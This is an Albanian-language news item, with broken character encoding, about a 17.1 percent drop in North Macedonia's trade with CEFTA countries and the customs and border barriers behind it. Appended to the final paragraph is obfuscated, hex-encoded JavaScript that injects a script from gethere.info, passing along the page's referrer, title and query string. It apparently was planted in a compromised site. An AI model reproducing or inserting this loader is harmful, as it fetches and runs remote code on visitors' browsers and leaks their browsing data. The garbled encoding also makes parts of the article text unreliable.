CEFTA

Maqedoni, bie shkA�mbimi me vendet e CEFTA-s

Sipas tA� dhA�nave statistikore, kA�mbimi i pA�rgjithshA�m i jashtA�m tregtar i MaqedonisA� me vendet nga CEFTA nA� tetA� muajt e parA� tA� vitit A�shtA� 1.103 milionA� dollarA� amerikanA� qA� paraqet rA�nie prej 17,1 pA�r qind nA� krahasim me periudhA�n e njA�jtA� tA� vitit tA� kaluar

Procedura e komplikuar nA� vendkalimet kufitare, mosnjohja e certifikatave pA�r cilA�si dhe mungesa e infrastrukturA�s sA� komunikacionit, janA� pjesA� e barrierave pA�r derdhje mA� tA� madhe tA� mallrave, me tA� cilat ballafaqohen vendet nga CEFTA.

Nga odat ekonomike e vendeve nga marrA�veshja CEFTA potencojnA� se moskonzistenca nA� implementimin e rregullativA�s doganore sjell deri nA� ngadalA�simin e derdhjes sA� mallrave dhe deri nA� pritje tA� dhe harxhime paplanifikuara, ndA�rsa pA�r shkak tA� mosndarjes sA� kompetencave tA� shA�rbimeve inspektuese ndodh qA� malli tA� kontrollohet mA� shumA� herA�.

“Mungon zgjidhje e pA�rbashkA�t e problemit nA� nivel tA� rajonit qA� tA� ketA� efekt mA� tA� madh. NA�se A�do vend problemin e zgjidh nA� mA�nyrA� bilaterale, ai nuk do tA� ketA� mbi rajonin nA� tA�rA�si”, theksoi Lubica Nuri. Rekomandimet do tA� parashtrohen nA� mbledhjen e CEFTA sekretariatit qA� do tA� mbahet mA� datA� 7 dhe 8 nA�ntor muaj nA� TiranA�, shkruan gazeta Lajm nA� Shkup.

Sipas tA� dhA�nave, kA�mbimi i pA�rgjithshA�m i jashtA�m tregtar i MaqedonisA� me vendet nga CEFTA nA� tetA� muajt e parA� tA� vitit A�shtA� 1.103 milionA� dollarA� amerikanA� qA� paraqet rA�nie prej 17.1 pA�r qind nA� krahasim me periudhA�n e njA�jtA� tA� vitit tA� kaluar. U realizua eksport me vlerA� prej 628.1 dhe import prej 474.6 milionA� dollarA�.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}